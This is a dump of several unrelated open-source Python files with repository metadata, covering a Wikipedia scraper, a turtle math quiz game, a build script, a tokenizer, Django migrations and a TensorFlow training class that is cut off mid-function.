8f37f2e453b8bc1294b0dbd34d9f873b54ec3013 | 80ca8c0f696a99e5f44fae4a8d423f041bbd81ff | /12Lesson(assignment)/app/search_engine.py | e89e50fa795c30849afddd16a9dcdbe5cc128852 | [] | no_license | C0nstanta/one | ce856f8f176894adc8270fa2f0e7d1c4fc1ddfaf | 7699dd0f9127e6775b36670d95cd7bbbc1adedbc | refs/heads/master | 2022-12-11T20:55:15.325716 | 2020-07-04T23:18:56 | 2020-07-04T23:18:56 | 214,294,255 | 0 | 0 | null | 2022-12-08T10:49:59 | 2019-10-10T22:08:06 | HTML | UTF-8 | Python | false | false | 3,430 | py | import requests
import os
from bs4 import BeautifulSoup
class SearchWiki:
    """Fetches a Wikipedia search/article page and extracts its readable text.

    Raw HTML, a stripped HTML copy and a plain-text dump are cached under
    <cwd>/app/testhtml/ for inspection.
    """

    filepath = os.getcwd()
    # Browser-like headers so Wikipedia serves the normal desktop page.
    headers = {
        'content-type': 'text',
        'Connection': 'keep-alive',
        'Search-Version': 'v3',
        'Accept': 'application/json',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) '
                      'Chrome/81.0.4044.129 Safari/537.36',
        'Accept-Encoding': 'gzip, deflate, br',
        'Accept-Language': 'en-US,en;q=0.9',
    }

    def wiki_search(self, wiki_request):
        """Download the Wikipedia page for *wiki_request*, cache the raw HTML,
        and return the extracted plain text."""
        self.wiki_request = wiki_request
        print("Hello")
        self.res = requests.get(f"https://en.wikipedia.org/wiki/Special:Search?search={self.wiki_request}&go=Go"
                                f"&ns0=1", headers=self.headers, allow_redirects=True).text
        with open(self.filepath + f"/app/testhtml/{self.wiki_request}.html", "w+", encoding='utf-8') as file:
            file.write(self.res)
        intro = self.pattern_method(self.res)
        return intro

    def pattern_method(self, res):
        """Strip navigation/footer chrome from the article body and return its text.

        On any failure returns a fallback "Nothing found" message.
        """
        try:
            test1 = BeautifulSoup(res, 'html.parser').find('div', attrs={'id': 'bodyContent'})
            # (translated from Russian) This chain of for-loops is clunky, but the
            # removals have to happen on the same tree; each loop strips one kind
            # of non-article chrome from the HTML.
            for excl_content in test1.find_all('table', attrs={'id': 'disambigbox'}):
                excl_content.extract()
            for excl_content in test1.find_all('div', attrs={'class': 'printfooter'}):
                excl_content.extract()
            for excl_content in test1.find_all('div', attrs={'class': 'mw-normal-catlinks'}):
                excl_content.extract()
            # Bug fix: this was attrs={'class', 'catlinks'} -- a *set* literal,
            # not a dict. find_all cannot use a set as an attrs mapping, so the
            # call raised inside this try block and every search fell through to
            # the "Nothing found" fallback below.
            for excl_content in test1.find_all('div', attrs={'class': 'catlinks'}):
                excl_content.extract()
            for excl_content in test1.find_all('noscript'):
                excl_content.extract()
            for excl_content in test1.find_all('a', attrs={'class': 'mw-jump-link'}):
                excl_content.extract()
            # drop blank lines from the extracted text
            del_empty_lines = [line for line in test1.get_text().splitlines() if line != '']
            print(del_empty_lines)
            with open(self.filepath + f"/app/testhtml/{self.wiki_request}-test.html", "w", encoding='utf-8') as file:
                file.write(str(test1))
            sum_line = ""
            with open(self.filepath + f"/app/testhtml/{self.wiki_request}-test-text.html", "w", encoding='utf-8') as \
                    file:
                for line in del_empty_lines:
                    sum_line += line + '\n'
                    file.write(str(line + '\n'))
            return sum_line
        except Exception as e:
            # best-effort: log the problem and return a user-facing fallback
            print(e)
            return "\nNothing found, specify the request"
| [
"inter.nafta32@gmail.com"
] | inter.nafta32@gmail.com |
c91fda8d7e718be057f365e3e68e11e3bb91229a | 35237eeeeda22cd65f895af675effb93ec6afe84 | /add_one.py | 02502e2033a7e95d12fe5f81f95e2d348badd5c7 | [] | no_license | saisunil702/pythonking | 7b548ccdeec66e83e13e3c4fe364834670a69676 | 0067d5af23281c0d94352421845144eec52aa4d0 | refs/heads/master | 2020-03-24T06:53:23.588716 | 2018-08-20T10:23:41 | 2018-08-20T10:23:41 | 142,545,491 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 30 | py | nom=int(input())
print(nom+1)
| [
"noreply@github.com"
] | saisunil702.noreply@github.com |
ef0f0814fa7c0a22523922f91021507554956c39 | 3ae545d444a0073b8c61b2bfae9854a58f2e0474 | /python/juego.py | bcd6c34f9ea63c7155a6738ae39277bc105384ab | [] | no_license | ExePtion31/Phyton | 9d1ad260977d6f9b4d14c44283cc827f372ff967 | 8a6af97a3d84c281a08dea14c8feec383594ca3c | refs/heads/main | 2022-12-25T07:07:23.282274 | 2020-10-07T21:03:13 | 2020-10-07T21:03:13 | 294,249,458 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,775 | py | # -*- coding: utf-8 -*-
from turtle import *
import random;
import time;
import threading;
from concurrent.futures import ThreadPoolExecutor;
# Shared turtle objects: the player turtle ("tortuga") plus hidden turtles
# used only for writing text (timer, lose/win banners).
screen = Screen()
tortuga = Turtle();
timeremaining = Turtle();
losesignal = Turtle();
winsignal = Turtle();
# Quiz data: preguntas[i] is answered correctly by respuestas[i].
# NOTE(review): the prompt text contains the typo "Respuetas" in some entries;
# it is user-facing text, left as-is here.
preguntas = [
    "Resolver la siguiente integral:\n ∫tanx dx\n\nRespuetas:\nA.-ln senx + C\nB.-ln cosx + C\nC.ln cosx + C\nD.-ln tanx - C",
    "Resolver la siguiente derivada f(x) = 2x^4 + x^3 - x^2 + 4\n\nRespuetas:\nA.f(x) = 8x^3 + 3x^2 - 2x\nB.f(x) = 8x^2 + 4x^2 - x\nC.f(x) = 8x^3 - 3x^2 - 2x\nD.f(x) = 5x^3 - 3x^2 + 2x",
    "¿A qué velocidad debe circular un auto de carreras para recorrer 50km en un cuarto de hora?\n\nRespuestas:\nA.150km/h\nB.180km/h\nC.200km/h\nD.300km/h",
    "Se deja caer un objeto desde la azotea de un edificio que tiene una altura de 12m. ¿En que tiempo toca el piso?\n\nRespuestas:\nA.1,23s\nB.1,90s\nC.2,00s\nD.1,57s",
    "Un jugador de Fútbol Americano patea el balón con una velocidad de 30 m/s, y éste mismo lleva un ángulo de elevación de 48° respecto a la horizontal. Calcule el tiempo que permanece en el aire.\n\nRespuestas:\nA.3,57s\nB.4,55s\nC.6,78s\nD.5,67s"
]
respuestas = ["b","a","c","d","b"];
#--------funcion main--------
def main():
    # Program entry point: build the screen and hand control to turtle.
    create_screen();
#---------------------------
#------create screen--------
def create_screen():
    # Set the window title, configure the turtles, then enter turtle's event loop.
    screen.title("Juego funciones matematicas")
    create_turtle();
    screen.mainloop();
#---------------------------
#------create turtle--------
def create_turtle():
    # Style the player turtle (pen up: it moves without drawing), then
    # continue with the timer display setup.
    tortuga.shape("turtle");
    tortuga.color("green");
    tortuga.penup();
    time_signal();
#---------------------------
#------time remaining-------
def time_signal():
    # Prepare the hidden turtle that draws the remaining-time text.
    timeremaining.speed(0);
    timeremaining.penup();
    timeremaining.hideturtle();
    positioning();
#---------------------------
#---------positioning-------
def positioning():
    # Reset win/lose banners, drop the player turtle at a random spot,
    # draw the initial timer text, then show the instructions dialog.
    winsignal.clear();
    losesignal.clear();
    winsignal.hideturtle();
    losesignal.hideturtle();
    tortuga.goto(random.randint(-230, 230), random.randint(-230, 230));
    timeremaining.goto(-200, 240);
    timeremaining.write("Tiempo: 0:00", align="center", font=("Courier", 24, "normal"));
    instructions();
#---------------------------
#-------instructions-------
def instructions():
    # Show the rules dialog and dispatch on the answer.
    # NOTE(review): answering "1" starts the quiz without the countdown thread,
    # while answering "si" starts only the countdown thread (single-worker pool)
    # without calling game_start(); any other answer quits. This asymmetry looks
    # unintentional -- confirm the intended flow before changing it.
    instrucciones = screen.textinput("Instrucciones:","Las instrucciones para el juego son las siguientes:\n1.Debe responder correctamente el problema matematico para poder hacer un movimiento\n2.Si responde mal el problema, el juego finalizara\n\n¿Entendio las instrucciones?\n1.Si\n2.No");
    if instrucciones == "1":
        game_start();
    elif instrucciones == "si":
        executor = ThreadPoolExecutor(max_workers=1);
        executor.submit(time_remaining);
    else:
        exit();
#--------------------------
#------game start----------
def game_start():
    # Main quiz loop: each correct answer unlocks one round of turtle movement;
    # a wrong answer shows the lose banner.
    # Fix: the original kept incrementing `contador` past the end of `preguntas`
    # (IndexError after the last correct answer) and win_signal() was never
    # reachable; now the win banner is shown once all questions are answered.
    contador = 0;
    while True:
        pregunta = screen.textinput("Pregunta",preguntas[contador]);
        if pregunta == respuestas[contador]:
            contador = contador + 1;
            if contador == len(preguntas):
                win_signal();
                return;
            move_turtle();
        else:
            lose_signal();
#-------------------------
#-------move turtle----------
def move_turtle():
    # Bind the arrow keys to the movement handlers and start listening.
    screen.onkeypress(forward_turtle,"Up");
    screen.onkeypress(backward_turtle,"Down");
    screen.onkeypress(left_turtle,"Left");
    screen.onkeypress(right_turtle,"Right");
    screen.listen();
#----------------------------
#-----forward turtle---------
def forward_turtle():
    # Move the player turtle 10 units forward.
    tortuga.forward(10);
#----------------------------
#-----backward turtle--------
def backward_turtle():
    # Move the player turtle 10 units backward.
    tortuga.backward(10);
#----------------------------
#--------left turtle---------
def left_turtle():
    # Rotate the player turtle 10 degrees counter-clockwise.
    tortuga.left(10);
#----------------------------
#-------right turtle---------
def right_turtle():
    # Rotate the player turtle 10 degrees clockwise.
    tortuga.right(10);
#----------------------------
#-----------winner/lose signal----------
def win_signal():
    # Draw the "WINNER" banner with a hidden helper turtle, then offer a restart.
    winsignal.speed(0);
    winsignal.shape("square");
    winsignal.color("black");
    winsignal.penup();
    winsignal.hideturtle() # make the turtle invisible.
    winsignal.write("¡WINNER!", align="center", font=("Courier", 30, "normal"))
    restart_game();
def lose_signal():
    # Draw the "LOSER" banner with a hidden helper turtle, then offer a restart.
    losesignal.speed(0);
    losesignal.shape("square");
    losesignal.color("black");
    losesignal.penup();
    losesignal.hideturtle() # make the turtle invisible.
    losesignal.write("¡LOSER!", align="center", font=("Courier", 30, "normal"))
    restart_game();
#-------------------------------------
#--------------restart game----------------------------
def restart_game():
    """Ask whether to restart; "si"/"1" repositions the game, "no"/"2" quits.

    Replaces the original 10-branch elif chain that enumerated case variants
    ("no"/"No"/"NO"/"nO", "si"/"Si"/"sI"/"SI") with a case-insensitive check.
    Accepted inputs and resulting actions are exactly the same; any other
    input (including a cancelled dialog, which returns None) does nothing,
    as before.
    """
    respuesta = screen.textinput("Desea reiniciar:", "¿Desea reiniciar el juego?:\n1.Si\n2.No");
    if respuesta is None:
        return;
    opcion = respuesta.lower();
    if opcion in ("no", "2"):
        exit();
    elif opcion in ("si", "1"):
        positioning();
#------------------------------------
#------------reloj----------------
def time_remaining():
    # Countdown clock: redraws "Tiempo: m : s" once per second on the
    # `timeremaining` turtle (runs in a worker thread, see instructions()).
    # NOTE(review): the lose condition fires when the display reaches 1:00
    # (i.e. after ~61 iterations) and the loop keeps running afterwards --
    # confirm this is the intended time limit behaviour.
    for m in range(0,60):
        for s in range(0,60):
            timeremaining.clear();
            timeremaining.write("Tiempo: {} : {}".format(m,s), align="center", font=("Courier", 24, "normal"));
            time.sleep(1);
            if m==1 and s==0:
                lose_signal();
#--------------------------------
#-------main-------------
#-------main-------------
if __name__ == "__main__":
    # Entry point: launch the turtle quiz game.
    main();
#------------------------ | [
"giovanni.baquero@uniagustiniana.edu.co"
] | giovanni.baquero@uniagustiniana.edu.co |
0b87298b937fe6f4f9ca7be7d7d98654015a6759 | 9e1e8562db2a32e7ee271e32ee198dcbdc83f6e2 | /utils/ErrorUtils.py | d4fdbcfa7af0b8c92c1dff924c0202a9e7acbb91 | [] | no_license | SpasZahariev/nqme-flask | e5ac66847867fa0239d4183d9dd9ada7a95d4115 | a2fb27bb0cef5d1ec8f36179e87aca76c3c62767 | refs/heads/master | 2023-08-07T14:39:12.260817 | 2022-02-01T19:19:23 | 2022-02-01T19:19:23 | 188,726,256 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 705 | py | from enum import Enum
class ErrorMsg(Enum):
    """User-facing error messages for the queue/room API, keyed by symbolic name."""
    NO_HEAD = 'No head is provided'
    NO_QUEUE = 'Queue does not exist'
    NO_SONG = 'Song does not exist'
    DEQ_FAIL = 'Song was not dequeued'
    NO_MASTER = 'Access denied! User is not a master'
    NO_USER = 'Access denied! User does not belong to this room'
    NOT_REMOVED = 'Song was not removed! It either does not exist or an error has occurred!'
    NO_VOTE = 'User has not voted for this song'
    VOTE_NOT_REMOVED = 'Vote was not removed! Please try again!'
    ERROR = 'An error has occurred! Please try again'
    HEAD_MISMATCH = 'Head does not correspond to state of queue'
    NO_AUTH = 'No authorization header is attached to the request'
"spaszahariev54@gmail.com"
] | spaszahariev54@gmail.com |
a4c0b4b317e3a3e61c1ea5f0d671a3fc136659f7 | af71ad6f9509b119dbaf86e661b372b073e07338 | /bild.py | adb9c3df317d0922e6d01a40842477f0677665d1 | [] | no_license | JoyLink/vtable | 4f01d5dc0bc0c9fc1ac7e5a826801168881f38c0 | 6b08045f9058e14242abf569ae86986464592b7d | refs/heads/master | 2020-12-24T18:51:05.558744 | 2016-04-26T23:55:32 | 2016-04-26T23:55:32 | 57,169,825 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,212 | py | #!/usr/bin/env python
# bootstrap by downloading bilder.py if not found
import urllib
import os
import glob
# ASSUMES YOU HAVE GNU indent installed. ($ brew install gnu-indent on mac os x)
# Executable is gindent
# http://www.gnu.org/software/indent/manual/
# Bootstrap: fetch the bilder build library on first run so this build script
# is self-contained (Python 2 syntax, matching the rest of the file).
if not os.path.exists("bilder.py"):
    print "bootstrapping; downloading bilder.py"
    urllib.urlretrieve(
        "https://raw.githubusercontent.com/parrt/bild/master/src/python/bilder.py",
        "bilder.py")
# assumes bilder.py is in current directory
from bilder import *
def parser():
    # Generate the ANTLR 4 parser for the J grammar into gen/, with a visitor.
    antlr4(srcdir="src/cs652/j/parser", trgdir="gen",
           package="cs652.j.parser",
           version="4.5",
           args=["-visitor"])
def compile():
    # Build target: generate the parser, fetch the jars, compile all Java
    # sources into out/. (Shadows the builtin `compile`; the name is the
    # command-line target dispatched by processargs, so it cannot be renamed.)
    require(parser)
    download("http://www.antlr.org/download/antlr-4.5-complete.jar", JARCACHE)
    download("http://www.antlr.org/download/symtab-1.0.jar", JARCACHE)
    javac("src", "out", javacVersion="1.8", cp="src:gen:out:resources:"+JARCACHE+"/antlr-4.5-complete.jar:"+JARCACHE+"/symtab-1.0.jar")
def mkjar():
    # Package the translator into a runnable fat jar (dist/jtran.jar):
    # unpack the dependency jars into out/, add the C template, and jar it all
    # with a generated manifest.
    require(compile)
    mkdir("dist")
    jarfile = "dist/jtran.jar"
    manifest = \
        "Main-Class: cs652.j.JTran\n" +\
        "Implementation-Title: JTran Java to C translator\n" +\
        "Implementation-Vendor-Id: org.antlr\n" +\
        "Built-By: %s\n" +\
        "Build-Jdk: 1.8\n" +\
        "Created-By: http://www.bildtool.org\n" +\
        "\n"
    manifest = manifest % os.getlogin()
    # merge dependency classes into out/ so the jar is self-contained
    unjar(os.path.join(JARCACHE, "antlr-4.5-complete.jar"), trgdir="out")
    unjar(os.path.join(JARCACHE, "symtab-1.0.jar"), trgdir="out")
    copyfile("resources/cs652/j/templates/C.stg", "out/cs652/j/templates/C.stg")
    jar(jarfile, srcdir="out", manifest=manifest)
    print_and_log("Generated " + jarfile)
def test(jfile):
    # Run one end-to-end test: translate jfile to C, compile the C with gcc,
    # run it, normalize both generated and expected C with GNU indent, and
    # diff the C and the program output against the expected files.
    log("TEST "+jfile)
    print("TEST "+jfile)
    dir = os.path.dirname(jfile)
    base = os.path.basename(jfile)
    base = os.path.splitext(base)[0]
    cfile = base+".c"
    expected_cfile = dir+"/"+cfile
    expected_output = dir+"/"+base+".txt"
    # translate J -> C into /tmp
    java(classname="cs652.j.JTran", cp="out:resources:"+JARCACHE+"/antlr-4.5-complete.jar:"+JARCACHE+"/symtab-1.0.jar",
         progargs=["-o", "/tmp/"+cfile, jfile])
    executable = "/tmp/" + base
    CC = ["gcc", "-o", executable, "/tmp/"+cfile]
    exec_and_log(CC)
    log(executable+" &> /tmp/"+base+".txt")
    os.system(executable+" &> /tmp/"+base+".txt")
    # normalize the file
    indent_args = ["-bap", "-bad", "-br", "-nce", "-ncs", "-nprs", "-npcs", "-sai", "-saw",
                   "-di1", "-brs", "-blf", "--indent-level4", "-nut", "-sob", "-l200"]
    exec_and_log(["gindent"]+indent_args+["/tmp/"+cfile])
    # compare with expected c file but first format the expected file as well
    exec_and_log(["gindent"]+indent_args+[expected_cfile, "-o", "/tmp/expected_"+base+".c"])
    exec_and_log(["diff", "/tmp/expected_"+base+".c", "/tmp/"+cfile])
    # compare with expected output
    exec_and_log(["diff", expected_output, "/tmp/"+base+".txt"])
def tests():
    # Run every .j test case from a clean build.
    # (Note: loop variable `file` shadows the Python 2 builtin.)
    clean()
    require(compile)
    for file in glob.glob("tests/cs652/j/*.j"):
        test(file)
def clean():
    # Remove all build products (compiled classes and generated parser).
    rmdir("out")
    rmdir("gen")
def all():
    # Default target: run the full test suite (which also builds).
    tests()
# Dispatch to the build target named on the command line (bilder convention).
processargs(globals())
| [
"joylinkyizhuo@gmail.com"
] | joylinkyizhuo@gmail.com |
52f26c2206606fbefa691cc6942173f41b6ca058 | 3f2b2c885e81a15ed22b4a781bc2e8f5f264b336 | /mhs/common/mhs_common/messages/envelope.py | 647b5cfc88274a3290b87d36d4fc9f90d8920933 | [
"Apache-2.0"
] | permissive | nhsconnect/prm-deductions-integration-adaptors | 9c947dbca3c5bf22874efb35364cd22b52acd795 | 17c78a2b2df3755736500d8b10f3e09c99263ef2 | refs/heads/deductions | 2021-07-20T11:13:59.339647 | 2020-12-22T09:48:09 | 2020-12-22T09:48:09 | 246,785,891 | 0 | 2 | Apache-2.0 | 2021-04-30T21:57:17 | 2020-03-12T08:50:37 | Python | UTF-8 | Python | false | false | 2,123 | py | """This module defines the base envelope used to wrap messages to be sent to a remote MHS."""
from __future__ import annotations
import abc
import pathlib
from typing import Dict, Tuple, Any
from builder import pystache_message_builder
from definitions import ROOT_DIR
# Keys for the values that Envelope subclasses read from / write into their
# message dictionaries.
FROM_PARTY_ID = "from_party_id"
TO_PARTY_ID = "to_party_id"
CPA_ID = "cpa_id"
CONVERSATION_ID = 'conversation_id'
SERVICE = "service"
ACTION = "action"
MESSAGE_ID = 'message_id'
TIMESTAMP = 'timestamp'
TO_ASID = 'to_asid'
FROM_ASID = 'from_asid'
RECEIVED_MESSAGE_ID = "received_message_id"
MESSAGE = "hl7_message"
# Name of the HTTP header that carries the content type.
CONTENT_TYPE_HEADER_NAME = "Content-Type"
# Message template location, relative to the project root (see Envelope.__init__).
TEMPLATES_DIR = "data/templates"
class Envelope(abc.ABC):
    """An envelope that contains a message to be sent to a remote MHS."""

    def __init__(self, template_file: str, message_dictionary: Dict[str, Any]):
        """Create a new Envelope that populates the specified template file with the provided dictionary.

        :param template_file: The template file to populate with values.
        :param message_dictionary: The dictionary of values to use when populating the template.
        """
        self.message_dictionary = message_dictionary

        # Templates are resolved relative to the project root so the path is
        # stable regardless of the current working directory.
        ebxml_template_dir = str(pathlib.Path(ROOT_DIR) / TEMPLATES_DIR)
        self.message_builder = pystache_message_builder.PystacheMessageBuilder(ebxml_template_dir, template_file)

    @abc.abstractmethod
    def serialize(self) -> Tuple[str, Dict[str, str], str]:
        """Produce a serialised representation of this message.

        :return: A tuple of: the message id, headers to send along with the message and the serialized representation
        of the message.
        """
        pass

    @classmethod
    @abc.abstractmethod
    def from_string(cls, headers: Dict[str, str], message: str) -> Envelope:
        """Parse the provided message string and create an instance of an Envelope.

        :param headers A dictionary of headers received with the message.
        :param message: The message to be parsed.
        :return: An instance of an Envelope constructed from the message.
        """
        pass
| [
"noreply@github.com"
] | nhsconnect.noreply@github.com |
2a12c95c893661baca9bef4785d6924789ae87e7 | 50e3d53c47250bca40fbbe49ea6f5979cf3ca807 | /tson/token.py | 46875ebbe66e3600a47e3695f0654d5d388e3a25 | [] | no_license | cstuartroe/tson | 1d85749e16d611dcf653cef4adc944932450db01 | 5485e0b6480150f3535c0ce634d228876dd76ba2 | refs/heads/main | 2023-04-18T12:11:35.751657 | 2021-05-02T18:39:58 | 2021-05-02T18:39:58 | 359,987,026 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,375 | py | import re
import sys
# Backslash escape codes mapped to the characters they denote (JSON escape set).
SINGLE_CHAR_ESCAPES = {
    '"': '"',
    '\\': '\\',
    '/': '/',
    'b': '\b',
    'f': '\f',
    'n': '\n',
    'r': '\r',
    't': '\t'
}

# Identifier: a letter or underscore followed by letters, digits or underscores.
LABEL_RE = "[a-zA-Z_][a-zA-Z0-9_]*"
# Numeric literal: optional minus, integer part, optional fractional part.
NUMERIC_RE = r"-?[0-9]+(\.[0-9]+)?"

# Boolean literal spellings mapped to their Python values.
BOOLS = {
    "true": True,
    "false": False,
}

# Words that introduce a declaration (see Token.resolve_symbol).
DECLARERS = {
    "type",
    "let",
}
class Token:
    """A lexical token: source position, raw text, type tag and parsed value."""

    # Type tags for the non-punctuation token classes; punctuation tokens use
    # the character itself as their ttype (see Tokenizer.grab_token).
    LABEL = "LABEL"
    NUMBER = "NUMBER"
    BOOL = "BOOL"
    STRING = "STRING"
    DECLARER = "DECLARER"
    NULL = "null"
    UNDEFINED = "undefined"

    def __init__(self, line_no, col_no, line, s, ttype, value):
        self.line_no = line_no  # 0-based line index
        self.col_no = col_no    # 0-based column index
        self.line = line        # full source line, kept for diagnostics
        self.s = s              # raw matched text
        self.ttype = ttype      # one of the tags above, or the punctuation char
        self.value = value      # parsed value (int/bool/str) or None

    def raise_error(self, message):
        """Print a caret diagnostic pointing at this token, then exit the process."""
        print(f"Line {self.line_no}, column {self.col_no}")
        print(self.line)
        # Bug fix: the caret was indented by line_no instead of col_no, so it
        # pointed at the wrong column whenever the two differed.
        print(' '*self.col_no + '^' + '~' * (len(self.s) - 1))
        print(message)
        sys.exit()

    def __repr__(self):
        # Positions are rendered 1-based for human readability.
        return f"Token(line_no={self.line_no+1}, col_no={self.col_no+1}, s={repr(self.s)}, ttype={repr(self.ttype)}, value={repr(self.value)})"

    @staticmethod
    def resolve_symbol(s):
        """Classify an identifier-shaped lexeme: bool literal, declarer, keyword or label.

        Returns a (value, ttype) pair; keywords carry no value and use the
        keyword itself as the type tag.
        """
        if s in BOOLS:
            return BOOLS[s], Token.BOOL
        elif s in DECLARERS:
            return s, Token.DECLARER
        elif s in KEYWORDS:
            return None, s
        else:
            return s, Token.LABEL
# Reserved words: Token.resolve_symbol maps these to a token whose ttype is
# the keyword itself and whose value is None.
KEYWORDS = {
    "let",
    "type",
    "import",
    "export",
    Token.NULL,
    Token.UNDEFINED
}
class Tokenizer:
    """Streams Tokens from a list of source lines.

    Scanning state is a (line_no, col_no) cursor; whitespace is skipped
    between tokens, so tokens() yields only meaningful lexemes.
    """

    def __init__(self, lines):
        # lines: the source text, pre-split into individual lines.
        self.lines = lines

    def tokens(self):
        """Generator yielding every token from the start of the input to EOF."""
        self.line_no = 0
        self.col_no = 0
        self.pass_whitespace()
        while not self.eof():
            yield self.grab_token()

    def eof(self):
        # End of input: cursor sits at the end of the last line.
        return self.line_no == len(self.lines) - 1 and self.eol()

    def eol(self):
        # End of the current line.
        return self.col_no == len(self.current_line())

    def newline(self):
        # Advance the cursor to the start of the next line.
        self.line_no += 1
        self.col_no = 0

    def current_line(self):
        return self.lines[self.line_no]

    def rest(self):
        # Unconsumed remainder of the current line.
        return self.current_line()[self.col_no:]

    def next(self, i=1):
        # Peek at the next i characters, clamped to the end of the line.
        return self.current_line()[self.col_no:min(self.col_no+i, len(self.current_line()))]

    def pass_whitespace(self):
        # Skip spaces, tabs and line breaks until the next token or EOF.
        while True:
            if self.eof():
                break
            elif self.eol():
                self.newline()
            elif self.next() in ' \t\r\n':
                self.col_no += 1
            else:
                break

    def grab_token(self):
        """Consume and return the next Token: number, label/keyword, or a
        single-character symbol (fallback)."""
        line_no = self.line_no
        col_no = self.col_no
        line = self.current_line()
        label = re.match(LABEL_RE, self.rest())
        number = re.match(NUMERIC_RE, self.rest())
        if number:
            s = number.group()
            # NOTE(review): int(s) raises ValueError for fractional matches
            # such as "1.5", which NUMERIC_RE allows -- confirm intended.
            val = int(s)
            ttype = Token.NUMBER
            self.col_no += len(s)
        elif label:
            s = label.group()
            val, ttype = Token.resolve_symbol(s)
            self.col_no += len(s)
        # TODO: strings
        else:
            # Fallback: a single punctuation character; its ttype is itself.
            s = self.next()
            val = None
            ttype = s
            self.col_no += 1
        self.pass_whitespace()
        return Token(
            line_no=line_no,
            col_no=col_no,
            line=line,
            s=s,
            value=val,
            ttype=ttype,
        )
| [
"cstuartroe@haverford.edu"
] | cstuartroe@haverford.edu |
efb465ae45ed7fa2b00ca94106f0b6d33d05e6bd | 135f624cf8c2d95eff09a07397da44c8e76d1a70 | /src/tasks/migrations/0003_auto_20170206_1153.py | 8c2bbb6235854c056f563c00840d7cc4929eb512 | [] | no_license | uk-gov-mirror/datagovuk.publish_data_alpha | 42709ffdf1e3ccedf6c5c742078fda5fc9522712 | 4cbafff4311da0693d456953d01b24f27101e41f | refs/heads/master | 2021-06-17T23:05:50.835551 | 2017-05-25T15:00:27 | 2017-05-25T15:00:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 485 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2017-02-06 11:53
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Alter tasks.Task.related_object_id to CharField(max_length=38, blank=True, null=True)."""

    dependencies = [
        ('tasks', '0002_task_related_object_id'),
    ]

    operations = [
        migrations.AlterField(
            model_name='task',
            name='related_object_id',
            field=models.CharField(blank=True, max_length=38, null=True),
        ),
    ]
| [
"ross@servercode.co.uk"
] | ross@servercode.co.uk |
329cb04ae1cab3aabc343c4547ca8dd288675bbc | 18fbcdfac031a73cb3292c1adec69dc368069639 | /anondolok_library/user_panel/migrations/0009_alter_appointments_requested_time.py | e3f20490985068a9ffb56c9e0b986563e3e84007 | [
"MIT"
] | permissive | Horraira/anondolokLibrary | 69ad35da75a53f977724c93d4da1f70980d2a587 | f80a9f1b620235136bec0794a67882f4cb420d50 | refs/heads/main | 2023-07-25T17:49:19.826806 | 2021-09-06T09:23:22 | 2021-09-06T09:23:22 | 403,559,630 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 442 | py | # Generated by Django 3.2.1 on 2021-07-08 10:59
from django.db import migrations, models
class Migration(migrations.Migration):
    """Alter user_panel.Appointments.requested_time to CharField(max_length=200, blank=True, null=True)."""

    dependencies = [
        ('user_panel', '0008_alter_appointments_requested_time'),
    ]

    operations = [
        migrations.AlterField(
            model_name='appointments',
            name='requested_time',
            field=models.CharField(blank=True, max_length=200, null=True),
        ),
    ]
| [
"sohan@inflexionpointbd.com"
] | sohan@inflexionpointbd.com |
7542f89e0cfc9b04e094048503a3ff6926a4561b | cf445784420af485e8cc6e571346a10a2e604520 | /PFCNN/PFCNN.py | 4d994a3ae8cbd8c0b30ebd7f14fe7000d93fedc2 | [
"MIT"
] | permissive | whuhxb/pfcnn | d829416c3aeb1eadf4f7d79d1ec7d480622d1804 | ae8530efeb795e50495dc1758ced61b0d02a677f | refs/heads/master | 2023-04-02T04:43:50.642344 | 2021-03-31T04:17:28 | 2021-03-31T04:17:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,443 | py | from tqdm import tqdm
import tensorflow as tf
import os
class PFCNN:
    """TF1-style training harness: wires a TFRecord input pipeline into the
    supplied network builder and runs the train/test loops with summaries
    and checkpointing."""

    def __init__(self, parse_function, network, flags):
        # parse_function: deserializes one TFRecord example into model inputs.
        # network: callable that builds the model graph from a parsed batch.
        # flags: configuration object (paths, sizes, hyper-parameters).
        self.parse_function = parse_function
        self.network = network
        self.flags = flags

    def parse_dataset(self, dataset_path):
        """Return the next-element op of an endlessly repeating TFRecord pipeline."""
        dataset = tf.data.TFRecordDataset(dataset_path)
        dataset = dataset.map(self.parse_function, num_parallel_calls=4)
        dataset = dataset.repeat()
        iterator = dataset.make_one_shot_iterator()
        return iterator.get_next()

    def build_dataset(self):
        """Create the train and test input pipelines from the configured TFRecord files."""
        self.train_data = self.parse_dataset(self.flags.tfrecord_path + self.flags.train_data)
        self.test_data = self.parse_dataset(self.flags.tfrecord_path + self.flags.test_data)

    def build_graph(self):
        """Build train/test graphs (shared weights), the L2-regularized loss and the optimizer."""
        self.build_dataset()
        # two graph instances over shared weights: dropout on for training,
        # variables reused and dropout off for evaluation
        self.train_output = self.network(self.train_data, self.flags.G_num, self.flags.level_num, self.flags.conv_shape, self.flags.class_num, reuse=False, is_point_feature=self.flags.is_point_feature, feature_channel=self.flags.feature_channel, drop_out=self.flags.drop_out)
        self.test_output = self.network(self.test_data, self.flags.G_num, self.flags.level_num, self.flags.conv_shape, self.flags.class_num, reuse=True, is_point_feature=self.flags.is_point_feature, feature_channel=self.flags.feature_channel, drop_out=0)
        self.train_vars = tf.trainable_variables()
        # mean per-variable L2 penalty, scaled by 1e-4
        self.lossL2 = tf.add_n([ tf.nn.l2_loss(v) for v in self.train_vars]) / len(self.train_vars) * 1e-4
        self.total_loss = self.train_output['loss'] + self.lossL2
        self.saver=tf.train.Saver(max_to_keep=5)
        self.best_saver = tf.train.Saver(max_to_keep=3)
        self.learning_rate = tf.placeholder(dtype=tf.float32, name="learning_rate")
        self.train_step = tf.train.AdamOptimizer(self.learning_rate).minimize(self.total_loss)

    def build_summary(self):
        """Create TensorBoard summary ops for losses and per-epoch accuracies."""
        L2_loss_summary = tf.summary.scalar('L2_Regular', self.lossL2)
        total_loss_summary = tf.summary.scalar('TotalLoss', self.total_loss)
